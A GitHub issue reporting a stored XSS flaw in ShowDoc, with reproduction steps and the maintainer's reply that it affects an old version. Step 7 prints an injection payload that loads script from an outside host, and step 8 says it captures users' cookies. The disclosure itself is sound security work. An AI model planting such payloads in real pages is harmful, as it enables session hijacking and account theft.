Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

We found a stored xss vulnerability in ShowDoc #325

Closed
farmsecHub opened this issue Jul 30, 2018 · 1 comment
Closed

We found a stored xss vulnerability in ShowDoc #325

farmsecHub opened this issue Jul 30, 2018 · 1 comment

Comments

@farmsecHub
Copy link

farmsecHub commented Jul 30, 2018

Hello friend,we are farmsec security team,we found a stored xss vulnerability in ShowDoc:
1.Click to register
xss1
2.Fill in user information
xss2
Click to register.
3.Start a new project
xss3
Click new project.
4.Fill in the project information
xss4
Click submit.
5.Click on the new project
xss5
Click on the new project xss test
6.Click + to create a new page
xss6
7.Fill in the xss vulnerability test payload
payload:
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='https://xxe.im/peKD';>
Click save
xss7
Access page
xss9
8.Get the user's cookie information
xss

@star7th
Copy link
Owner

star7th commented Jul 30, 2018

This is an old version .please update.

@star7th star7th closed this as completed Jul 31, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants